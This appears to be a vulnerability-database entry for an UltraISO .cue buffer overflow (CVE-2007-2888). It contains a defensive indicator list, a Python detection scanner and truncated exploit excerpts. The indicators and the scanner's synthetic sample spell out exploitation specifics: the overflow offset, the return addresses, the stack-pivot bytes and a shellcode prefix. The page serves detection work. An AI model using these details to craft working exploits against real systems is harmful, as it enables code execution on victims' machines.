CVE-2007-2888
Published 2007-05-30
Priority P345 · high · 7.6 CVSS 2.0 (vector AV:N/AC:H/Au:N/C:C/I:C/A:C)
Exploit available
EPSS 54.68% (98.9th percentile)
Stack-based buffer overflow in UltraISO 8.6.2.2011 and earlier allows user-assisted remote attackers to execute arbitrary code via a long FILE string (filename) in a .cue file, a related issue to CVE-2007-2761. NOTE: some details are obtained from third party information.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ezb_systems | ultraiso | <= 8.6.2.2011 | — |
Detection & IOCs (extracted from sources)
- bytes: \x46\x49\x4c\x45\x20\x22 (FILE ")
- bytes: \x81\xc4\x54\xf2\xff\xff (add esp, 0xfffff254 stack pivot prepend encoder)
- bytes: Metasploit calc.exe shellcode: \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49...
- Trigger is a crafted .cue file whose FILE field contains a filename string of 1099+ bytes, overflowing a fixed-size stack buffer; a companion .bin file with the same base name must exist in the same directory.
- Detect anomalously long FILE field values in .cue files: the exploit uses 1099–1100 'A' (0x41) bytes before the overwritten return address.
- Opening either the .cue or the .bin file triggers the vulnerability; both files must share the same base name and reside in the same directory.
- Bad characters for payload encoding are null byte, LF, CR, and double-quote (\x00\x0a\x0d\x22). Their presence in the FILE field of a .cue file is normal; their absence in an otherwise oversized field is suspicious.
- The Metasploit module prepends a stack-pivot stub (\x81\xc4\x54\xf2\xff\xff) before the payload; scan for this byte sequence inside .cue FILE field content.
- A jmp esp gadget at 0x77f84143 (ntdll/kernel32 on XP SP2) is used as the return address; the little-endian bytes \x43\x41\xf8\x77 at offset 1099 in the FILE field indicate exploitation.
- Return address offsets differ between UltraISO versions: 0x00594740 for v8.6.2.2011 portable and 0x0059170c for v8.6.0.1936; exploits targeting one version will not work reliably against the other.
- The PoC and exploits were tested on Windows XP Service Pack 2 only; reliability on other Windows versions is not confirmed.
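As an added detection example (not code from this page or from any of the exploits it lists), the following Python scanner parses the FILE fields of a .cue sheet and reports the indicators listed above: an oversized filename, the 1099-byte overflow length, the little-endian jmp esp address at offset 1099, the Metasploit stack-pivot stub, and control bytes inside the field. The 256-byte "suspicious" threshold and the two sample inputs are assumptions and constructions of mine.

```python
import re

# Indicator values from the Detection & IOCs list above.
FILE_TOKEN = b'FILE "'                    # \x46\x49\x4c\x45\x20\x22
OVERFLOW_LEN = 1099                       # filler bytes before the saved return address
JMP_ESP_LE = b"\x43\x41\xf8\x77"          # 0x77f84143 (jmp esp on XP SP2), little-endian
PIVOT_STUB = b"\x81\xc4\x54\xf2\xff\xff"  # add esp, 0xfffff254, prepended by the Metasploit module
SUSPICIOUS_LEN = 256                      # assumption: no legitimate .bin path is longer than this
_FIELD_END = re.compile(rb'["\r\n]')      # quote, CR and LF are bad chars, so any of them ends the field


def file_fields(data: bytes):
    """Yield (offset, value) for every FILE "..." field in a cue sheet; the value runs to the
    closing quote or, if that is missing, to end of line or file, so unterminated fields are seen."""
    pos = 0
    while (i := data.find(FILE_TOKEN, pos)) >= 0:
        start = i + len(FILE_TOKEN)
        m = _FIELD_END.search(data, start)
        end = m.start() if m else len(data)
        yield start, data[start:end]
        pos = end


def scan_cue(data: bytes) -> list[str]:
    """Return human-readable findings for one cue sheet; an empty list means nothing matched."""
    findings = []
    for off, value in file_fields(data):
        n = len(value)
        if n > SUSPICIOUS_LEN:
            findings.append(f"FILE field at offset {off} is {n} bytes long")
        if n >= OVERFLOW_LEN:
            findings.append("FILE field reaches the 1099-byte overflow length")
        if value[OVERFLOW_LEN:OVERFLOW_LEN + 4] == JMP_ESP_LE:
            findings.append("little-endian 0x77f84143 (jmp esp) at offset 1099")
        if PIVOT_STUB in value:
            findings.append("Metasploit stack-pivot stub (add esp, 0xfffff254) present")
        if any(b < 0x20 for b in value):
            findings.append("control bytes inside the filename")
    return findings


# Constructed samples: a benign cue sheet and a synthetic field built only from the
# indicator bytes above (filler, return address, pivot stub; no payload).
BENIGN_CUE = b'FILE "disc.bin" BINARY\r\n  TRACK 01 MODE1/2352\r\n    INDEX 01 00:00:00\r\n'
SYNTHETIC_CUE = b'FILE "' + b"A" * OVERFLOW_LEN + JMP_ESP_LE + PIVOT_STUB + b"\r\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_CUE), ("synthetic", SYNTHETIC_CUE)):
        print(name, scan_cue(blob) or "clean")
```

Only the .cue side can be checked this way; the companion .bin is opaque image data, so the scanner should be run over every .cue that arrives alongside one.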
No detection rules found.
Exploit-DB
UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)
exploitdb·2010-04-30
---
##
# $Id: ultraiso_cue.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'UltraISO CUE File Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in EZB Systems, Inc's
UltraISO. When processing .CUE files, data is read from file into a
fixed-size stack buffer. Since no bounds checking is done, a buffer overflow
can occur. Attackers can execute arbitrary code by convincing their victim
to open an CUE f
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
exploitdb·2007-05-28
---
#
#ultra iso exploit
#thomas . pollet @ gmail . com
#
import struct
scode=(#metasploit calc.exe shellcode
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
exploitdb·2007-05-28
---
/*
Date : May 28th 2007.
UltraISO executes calc. Don't
forget you need to have the bin and cue file in the same
directory. Special thanks to Thomas Pollet also.
*/
#include
#include
//Calc shell_code
unsigned char shell_code[] =
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
exploitdb·2007-05-24
---
#!/usr/bin/perl
############################################################
#Credit:To n00b for finding this bug and writing poc.
############################################################
#Ultra ISO stack overflow PoC code.
#Ultra ISO is exploitable via opening
#a specially crafted cue file. There is
#a limitation that the user must have the bin
#file in the same dir as the cue file.
#This is the reason I have provided the
#bin file also. Command execution is possible
#as we can control $ebp and $eip hoooooha.
#I will be working on the local exploit
#as soon as I get a chance. This should be straightforward
#to exploit as we already gain control of the
#$eip register.
#Tested on: Win XP Service Pack 2
#Vendor'
Metasploit
UltraISO CUE File Parsing Buffer Overflow
metasploit
This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open a CUE file. NOTE: A file with the same base name, but the extension of "bin" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.
No writeups or analysis indexed.
References
http://osvdb.org/36570
http://secunia.com/advisories/25384
http://www.securityfocus.com/bid/24140
https://exchange.xforce.ibmcloud.com/vulnerabilities/34485
https://www.exploit-db.com/exploits/3978